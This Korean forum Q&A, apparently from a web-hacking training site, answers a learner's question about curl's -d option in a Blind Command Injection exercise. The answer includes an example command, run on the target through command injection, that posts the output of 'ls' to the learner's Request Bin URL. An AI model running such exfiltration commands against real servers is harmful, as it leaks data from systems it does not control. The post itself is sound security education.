curl 명령어관련해서 질문드립니다~
웹해킹 1단계 마지막 Blind-Command에서 request bin을 사용할 때 curl에 -d를 입력하고 다른 것들을 입력하더라구요. 혹시 -d가 무엇을 의미하는 걸까요? 그리고 "fizz=buzz"라는 문구도 있는 데 이것은 무슨 의미인가요?
답변부탁드립니다~
#웹해킹
작성자 정보
답변
1
kimht
공부벌레
-d [DATA]
또는 --data [DATA]
옵션을 명시해주면, [DATA]
부분을 서버에 POST 메서드로 전송시키겠다는 것을 의미합니다.
해당 옵션을 활용하면 Command Injection 공격 시, 문제 서버의 데이터를 Request Bin에 전송시켜서 받아볼 수 있습니다.
활용법을 좀 더 자세하게 설명해 드리자면 다음과 같은 상황일 때,
- Command Injection으로 문제 서버상에서 아무 명령어나 실행시킬 수 있다.
- 내 Request Bin은
https://zdecuwo.request.dreamhack.games
이다.
아래 명령어를 문제 서버상에서 실행시키면,
curl https://zdecuwo.request.dreamhack.games -d "$(ls)"
문제 서버에서 ls 명령어를 친 결과가 Request Bin에 POST 메서드로 전송됩니다.
Request Bin에서는 자신에게 전송된 것들을 확인할 수 있기 때문에 문제 서버에 존재하는 파일이나 디렉토리를 확인할 수 있습니다.
"fizz=buzz"는 어느 곳에서 나오는 문구인지 알려주시면 확인해보겠습니다!